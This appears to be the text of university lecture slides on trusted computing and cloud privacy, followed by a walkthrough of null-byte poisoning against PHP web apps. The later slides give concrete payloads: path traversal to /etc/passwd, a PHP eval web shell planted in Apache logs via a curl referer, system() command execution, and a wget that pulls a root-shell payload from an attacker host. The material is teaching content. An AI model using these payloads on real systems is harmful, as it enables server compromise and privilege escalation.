Trusted computing and the cloud

UNR – CSE, Jeff Naruchitparames 2

( and null-byte poisoning attacks for the web )

UNR – CSE, Jeff Naruchitparames 3

Computer architecture

Security... privacy

Digital & physical threats

UNR – CSE, Jeff Naruchitparames 4

1. Identification – cryptographic

2. Attestation – digital signatures

3. Normal operating environment – from the computer's environment

(remotely, to

o!)

UNR – CSE, Jeff Naruchitparames 5

UNR – CSE, Jeff Naruchitparames 6

Control!

UNR – CSE, Jeff Naruchitparames 7

Trusted platform module (TPM)

Trusted computing group (TCG)

Root of trust

Dictate accessibility (permissions) a user has

UNR – CSE, Jeff Naruchitparames 8

But wait! … this is not a bad thing

UNR – CSE, Jeff Naruchitparames 9

Software as a Service, SaaS

Platform as a Service, PaaS

Infrastructure as a Service, IaaS

UNR – CSE, Jeff Naruchitparames 11

Problem: Storage

Solution: Encryption, duh!

Problem: Processing/computation of information

Solution: ???

UNR – CSE, Jeff Naruchitparames 12

Without looking!

UNR – CSE, Jeff Naruchitparames 13

Blind processing

Ensuring security and in particular, privacy of information from third parties (sys admins, users, hackers, etc)

UNR – CSE, Jeff Naruchitparames 14

Why so important?

ISPs

Power grid owners

Google, Amazon, other web 2.0 companies, etc

Political, economic, competition, etc

UNR – CSE, Jeff Naruchitparames 15

Technical details for another day...

Null-byte poisoning attacks (null-byte injection)

UNR – CSE, Jeff Naruchitparames 16

Add URL-encoded null-byte characters (%00, 0x00) to user-supplied data

Bypass input sanity checking filters

UNR – CSE, Jeff Naruchitparames 17

javascript, ASP

Processing accomplished by C/C++ functions

UNR – CSE, Jeff Naruchitparames 18

NULL

= string termination or delimiter

= stop processing a string

= bytes following delimiter will be ignored

UNR – CSE, Jeff Naruchitparames 19

If a string loses its null character, the length of the string = unknown...

… until memory pointer finds the next null byte.

UNR – CSE, Jeff Naruchitparames 20

http://foo.org/index.php[?lang=bar]

/web/htdocs/foo/

Template file includes, yay!

http://foo.org/index.php?lang=../../../etc/password%00

UNR – CSE, Jeff Naruchitparames 21

http://foo.org/index.php?lang=../../../proc/self/fd/2%00

Inject shellcode via symbolic links from /proc/self/<whatever>.

This example assumes Apache error logs are located in /proc/self/fd/2

Now what?

UNR – CSE, Jeff Naruchitparames 22

Note: Error logs are typically written without filtering referer variables (from browsers)

curl “http://foo.org/” -H “Host:” --referer “<?php eval($_GET[cmd]); ?>”

[Mon Feb 08 09:27:45 2010] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /, referer: <?php eval($_GET[cmd]); ?>

UNR – CSE, Jeff Naruchitparames 23

http://foo.org/index.php?&lang=../../../proc/self/fd/2%00&cmd=system('pwd')

Write issues?! (permissions)

UNR – CSE, Jeff Naruchitparames 24

http://foo.org/index.php?&lang=../../../proc/self/fd/2%00&cmd=system('find -Type d -perm 0777')

Assume we find a writable directory at: /home/user/public_html/php_files_for_school/

UNR – CSE, Jeff Naruchitparames 25

Injection time!

http://foo.org/index.php?lang=../../../proc/self/fd/2%00&cmd=system('wget -O /home/user/public_html/php_files_for_school/homework3.php http://haxor.website/files/amazing_shellcode_to_obtain_root_access/get_root_shell.php');

Privilege escalation

UNR – CSE, Jeff Naruchitparames 26

Responsible disclosure! YEAH